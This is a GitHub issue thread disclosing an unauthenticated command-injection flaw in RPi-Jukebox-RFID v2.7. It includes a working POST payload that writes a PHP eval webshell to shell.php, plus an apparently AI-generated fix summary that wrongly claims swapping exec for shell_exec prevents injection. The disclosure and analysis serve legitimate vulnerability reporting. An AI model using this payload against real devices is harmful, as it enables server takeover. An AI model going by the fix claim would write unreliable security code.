🐛 | RPi-Jukebox-RFID V2.7_RCE_1 #2396
Comments
xjzzzxx
added
bug
legacy_v2
|
I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC: Poc_fixed
Data
Here is Data without url encoding for ease of understanding:
Manual verification
|
|
Thanks for bringing that up. If you want you could also open a PR which would fix these issues. |
|
Thank you for your reply. Recently, I have been focusing on reporting vulnerabilities in multiple web applications, so I am unable to help you fix this issue in the short term. How does this POC workFor this series of issues, it is essentially because the part of the code that executes commands is introduced without checking the data submitted by the user. Taking this RCE vulnerability as an example: The value of When the commands executed by the program can be controlled by the user, it is easy to produce unexpected effects. For hackers, they are committed to uploading some Trojans to gain control of the server. The effect of this PoC is to make the executed command look like the following:
It can be noted that the semicolon(;) in PoC enable the execution of multiple commands here, with the second command writing a webshell named shell.php to the file system ( How to fixBecause I don't have time to open a PR to fix these vulnerabilities in the short term,I am here to provide some fix suggestions:
I hope it can help you
|
Fix the Remote Code Execution (RCE) vulnerability in `htdocs/inc.setWlanIpMail.php` by sanitizing and validating user input. See #2396 * **Sanitization and Validation:** - Add validation for the email address using `filter_var` with `FILTER_VALIDATE_EMAIL`. - Add sanitization for the email address using `htmlspecialchars`. - Replace the `exec` function with `shell_exec` to prevent command injection. * **Unit Tests:** - Add `tests/htdocs/inc/SetWlanIpMailTest.php` to validate the email address using `filter_var` with `FILTER_VALIDATE_EMAIL`. - Add unit tests to sanitize the email address using `htmlspecialchars`. - Add unit tests to ensure the `exec` function is replaced with `shell_exec`. --- For more details, open the [Copilot Workspace session](https://copilot-workspace.githubnext.com/MiczFlor/RPi-Jukebox-RFID?shareId=XXXX-XXXX-XXXX-XXXX).
Version
v2.7.0
Branch
released
OS
ubuntu 22
Pi model
unknown
Hardware
No response
What happened?
Hello,
I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)
Analysis
The path of the vulnerability: htdocs\inc.setWlanIpMail.php
Source from Line 36 (
$_POST['WlanIpMailAddr']).And then there are three check point ,which we should set
$_POST['WlanIpMailYN'] = 1to bypass.After bypass three check point, the source(tainted) pass to
$WlanIpMailAddrandexec($exec);(Line 52) without another check.Poc
POST /htdocs/inc.setWlanIpMail.phpData:
WlanIpMailYN=1&WlanIpMailAddr=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell.php++%3b+echo+%22helloHere is Data without url encoding for ease of understanding:
WlanIpMailYN=1&WlanIpMailAddr=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell.php ; echo "helloManual verification
The attacker can then easily connect to this webshell(/htdocs/shell.php)
Logs
No response
Configuration
No response
More info
No response
The text was updated successfully, but these errors were encountered: